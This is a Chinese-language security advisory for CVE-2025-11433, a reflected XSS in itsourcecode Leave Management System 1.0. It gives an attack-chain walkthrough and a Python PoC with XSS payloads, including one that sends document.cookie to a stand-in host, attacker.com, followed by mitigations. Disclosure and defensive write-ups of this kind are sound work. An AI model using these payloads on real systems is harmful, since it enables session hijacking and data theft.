CVE-2025-11433：itsourcecode请假管理系统反射型XSS漏洞

漏洞信息

漏洞编号

CVE-2025-11433

漏洞类型

反射型跨站脚本（Reflected XSS）

CVSS评分

3.5 低危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

需要交互 (UI:R)

影响产品

itsourcecode Leave Management System

漏洞概述

CVE-2025-11433是itsourcecode Leave Management System 1.0版本中存在的一个反射型跨站脚本（Reflected XSS）安全漏洞。该漏洞由安全研究人员在2025年10月8日公开披露，CVSS 3.1评分为3.5分，属于低危级别。

itsourcecode Leave Management System是一款用于管理员工请假流程的开源Web应用程序，广泛应用于中小型企业的HR管理场景。该系统提供了员工请假申请、审批流程、假期余额管理等功能。

该漏洞存在于系统的Query Parameter Handler组件中，具体位于/module/employee/controller.php文件的redirect函数（通过action=reset参数触发）。当用户访问包含恶意构造参数的URL时，参数中的JavaScript代码会在受害者的浏览器中执行。由于攻击者可以通过精心构造的URL来触发漏洞，且该漏洞可被远程利用，因此存在被用于钓鱼攻击、会话劫持或窃取用户敏感信息的风险。

值得注意的是，该漏洞的利用代码已被公开发布到GitHub等平台，这意味着任何攻击者都可以轻松获取并利用该漏洞进行攻击。系统管理员应当尽快采取修复措施以降低安全风险。

技术细节

该漏洞是一个典型的反射型XSS漏洞，根源在于其sourcecode Leave Management System对用户输入参数缺乏充分的过滤和转义处理。

漏洞触发流程如下：

1. **入口点**：漏洞位于/module/employee/controller.php文件中，当请求中包含action=reset参数时，系统会调用redirect函数进行处理。

2. **参数处理**：redirect函数接收名为ID的参数，该参数来源于HTTP请求的查询字符串（Query String）。系统直接将此参数的值用于页面重定向或页面渲染输出，而未对其进行HTML实体编码或过滤。

3. **注入点**：攻击者可以构造包含恶意JavaScript代码的URL，例如在ID参数中注入<script>alert(document.cookie)</script>或<img src=x onerror=...>等payload。

4. **执行机制**：当受害者点击或访问该恶意构造的URL时，服务器将未经过滤的参数值直接嵌入到返回的HTML响应中，浏览器解析该HTML时便会执行其中的恶意脚本。

5. **攻击影响**：由于该漏洞需要低权限认证（PR:L）且需要用户交互（UI:R），攻击者通常需要结合社会工程学手段（如钓鱼邮件、即时消息等）诱导已登录的用户点击恶意链接。成功利用后，攻击者可以窃取用户的会话Cookie、进行钓鱼攻击、篡改页面内容或执行其他恶意操作。

该漏洞利用难度较低，PoC代码已公开，攻击者可使用简单的URL编码即可绕过基本的安全防护。

攻击链分析

STEP 1

步骤1：信息收集

攻击者通过搜索引擎或Shodan等工具识别暴露在公网上的itsourcecode Leave Management System 1.0实例，并确认目标系统存在该漏洞。

STEP 2

步骤2：构造恶意URL

攻击者构造包含恶意JavaScript payload的URL，利用未过滤的ID参数注入XSS代码，例如：/module/employee/controller.php?action=reset&ID=<script>...</script>

STEP 3

步骤3：投递恶意链接

攻击者通过钓鱼邮件、即时通讯工具或社交媒体等方式，将恶意URL发送给目标组织的已登录用户，诱导其点击。

STEP 4

步骤4：触发漏洞

受害者在已登录状态下点击恶意链接，浏览器向目标服务器发送请求，服务器将未转义的恶意脚本嵌入响应页面返回。

STEP 5

步骤5：执行恶意代码

浏览器解析响应时执行注入的JavaScript代码，攻击者可窃取用户会话Cookie、进行钓鱼攻击或执行其他恶意操作。

STEP 6

步骤6：权限利用

利用窃取的会话信息，攻击者可以冒充合法用户执行操作，如修改请假记录、查看敏感员工信息或进一步渗透系统。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-11433 - Reflected XSS PoC
# Target: itsourcecode Leave Management System 1.0
# Vulnerable endpoint: /module/employee/controller.php?action=reset
# Vulnerable parameter: ID

# Basic XSS payload via ID parameter
import requests

target_url = "http://target.com/module/employee/controller.php"

# Payload 1: Simple script injection
payload_script = "<script>alert('XSS-CVE-2025-11433')</script>"

# Payload 2: Cookie stealing (for demonstration)
payload_cookie = "<script>document.location='http://attacker.com/steal.php?cookie='+document.cookie</script>"

# Payload 3: Event-based injection
payload_event = "<img src=x onerror=alert(document.domain)>"

# Send the malicious request
params = {
    "action": "reset",
    "ID": payload_script
}

response = requests.get(target_url, params=params)
print(f"Status Code: {response.status_code}")
print(f"Response contains payload: {payload_script in response.text}")

# Direct URL example:
# http://target.com/module/employee/controller.php?action=reset&ID=<script>alert('XSS')</script>

影响范围

itsourcecode Leave Management System 1.0

防御指南

临时缓解措施

在官方补丁发布之前，建议采取以下临时缓解措施：1）在Web服务器或反向代理层面部署WAF规则，拦截包含常见XSS payload的请求；2）在应用代码层面临时修改controller.php文件，对ID参数使用htmlspecialchars()或类似函数进行HTML实体编码；3）配置Content-Security-Policy响应头，限制内联脚本执行；4）为所有Cookie添加HTTPOnly属性，防止脚本窃取会话；5）加强用户安全意识培训，提醒员工不要点击来源不明的链接。